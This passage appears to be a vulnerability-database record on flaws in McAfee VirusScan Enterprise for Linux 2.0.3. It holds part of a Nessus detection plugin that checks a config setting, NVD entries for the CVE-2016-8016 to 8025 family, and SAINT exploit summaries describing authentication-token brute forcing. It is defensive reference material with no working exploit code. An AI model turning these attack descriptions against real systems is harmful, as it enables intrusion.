An authenticated, remote\n attacker can exploit this to inject or manipulate SQL\n queries in the back-end database, resulting in the\n manipulation or disclosure of arbitrary data.\n (CVE-2016-8025)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://nation.state.actor/mcafee.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Endpoint Security for Linux (ENSL) version 10.2.0 or later.\nAlternatively, as a workaround, open the following line in a text editor:\n'/var/opt/NAI/LinuxShield/etc/nailsd.cfg' and change 'nailsd.disableCltWEbUI: false' \nto the value of true and restart the nails service.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8024\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:virusscan_enterprise\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_vsel_detect.nbin\");\n script_require_keys(\"installed_sw/McAfee VirusScan Enterprise for Linux\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\n\nif ( islocalhost() )\n{\n port = 0;\n if ( ! defined_func(\"pread\") ) exit(1, \"'pread()' is not defined.\");\n info_t = INFO_LOCAL;\n}\nelse\n{\n port = kb_ssh_transport();\n if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, \"ssh_open_connection()\");\n\n info_t = INFO_SSH;\n}\n\napp_name = \"McAfee VirusScan Enterprise for Linux\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nvuln = FALSE;\n\nif (ver_compare(ver:version, fix:\"2.0.3\", strict:FALSE) <= 0 || version =~ \"^2\\.0\\.3\") \n{\n cmd = 'grep nailsd.disableCltWebUI /var/opt/NAI/LinuxShield/etc/nailsd.cfg | tr -d \"\\n\"';\n buf = info_send_cmd(cmd:cmd);\n # match = is temporary workaround in place?\n match = pregmatch(pattern:'nailsd.disableCltWebUI: true', string:buf);\n if (!isnull(match)) audit(AUDIT_HOST_NOT, \"affected because 'nailsd.disableCltWebUI' is set to true\");\n # set to false & vulnerable\n notSet = pregmatch(pattern:'nailsd.disableCltWebUI: false', string:buf);\n # no config setting & vuln\n dne = pregmatch(pattern:'nailsd.disableCltWebUI:', string:buf);\n # if false or if the config does not exist and we are v2.0.3 then flag as vuln\n if (!isnull(notSet) || isnull(dne)) vuln = TRUE;\n}\n\n\nif (vuln)\n{\n port = 0;\n report ='\\nInstalled version : ' + version +\n '\\nSolution : Upgrade to McAfee Endpoint Security for Linux (ENSL) 10.2.0 or later.\\n';\n security_report_v4(severity:SECURITY_WARNING, 
extra:report, port:port, xss:TRUE, sqli:TRUE, xsrf:TRUE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to execute unauthorized commands via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8018", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8018", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Special element injection vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to read files on the webserver via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8017", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8017", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to obtain product information via a crafted HTTP request parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8025", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8025", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Information exposure in Intel Security VirusScan 
Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to obtain the existence of unauthorized files on the system via a URL parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8016", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8016", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Authentication bypass by assumed-immutable data vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to bypass server authentication via a crafted authentication cookie.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8023", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8023", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper neutralization of CRLF sequences in HTTP headers vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to obtain sensitive information via the server HTTP response spoofing.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8024", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8024", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper verification of cryptographic signature vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to spoof update server and execute arbitrary code via a crafted input file.", "modified": "2017-09-03T01:29:00", 
"id": "CVE-2016-8021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8021", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8021", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in attributes in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows unauthenticated remote attackers to inject arbitrary web script or HTML via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8019", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8019", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper control of generation of code vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to execute arbitrary code via a crafted HTTP request parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8020", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8020", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Authentication bypass by spoofing vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to execute arbitrary code or cause a denial of service via a crafted authentication cookie.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8022", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8022", "type": "cve", "cvss": {"score": 5.1, "vector": 
"AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 12/23/2016 \nCVE: [CVE-2016-8023](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8023>) \nBID: [94823](<http://www.securityfocus.com/bid/94823>) \n\n\n### Background\n\n[McAfee VirusScan Enterprise for Linux](<http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx>) is real-time, anti-malware software for Linux. \n\n### Problem\n\nMcAfee VirusScan Enterprise for Linux allows remote attackers to execute arbitrary commands by exploiting multiple vulnerabilities, including the ability to brute-force authentication tokens, a file write vulnerability using a malicious update server, and an authenticated file execution vulnerability. \n\n### Resolution\n\nApply the fix referenced in [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>). \n\n### References\n\n<https://nation.state.actor/mcafee.html> \n<http://news.softpedia.com/news/vulnerabilities-found-in-linux-security-software-can-give-hackers-root-access-510936.shtml> \n\n\n### Limitations\n\nExploit works on McAfee VirusScan Enterprise for Linux 1.9.2 through 2.0.2. Since this exploit uses a brute-force attack it may take some time to run. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "SAINT:3F45369261059DA84B497885AF5B9BCB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_virus_scan_linux_brute", "title": "McAfee VirusScan Enterprise for Linux authentication token brute force", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 12/23/2016 \nCVE: [CVE-2016-8023](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8023>) \nBID: [94823](<http://www.securityfocus.com/bid/94823>) \n\n\n### Background\n\n[McAfee VirusScan Enterprise for Linux](<http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx>) is real-time, anti-malware software for Linux. \n\n### Problem\n\nMcAfee VirusScan Enterprise for Linux allows remote attackers to execute arbitrary commands by exploiting multiple vulnerabilities, including the ability to brute-force authentication tokens, a file write vulnerability using a malicious update server, and an authenticated file execution vulnerability. \n\n### Resolution\n\nApply the fix referenced in [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>). \n\n### References\n\n<https://nation.state.actor/mcafee.html> \n<http://news.softpedia.com/news/vulnerabilities-found-in-linux-security-software-can-give-hackers-root-access-510936.shtml> \n\n\n### Limitations\n\nExploit works on McAfee VirusScan Enterprise for Linux 1.9.2 through 2.0.2. Since this exploit uses a brute-force attack it may take some time to run. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "SAINT:9BB81EFD042AB3DA9DDEDA9585D54BE2", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_virus_scan_linux_brute", "title": "McAfee VirusScan Enterprise for Linux authentication token brute force", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}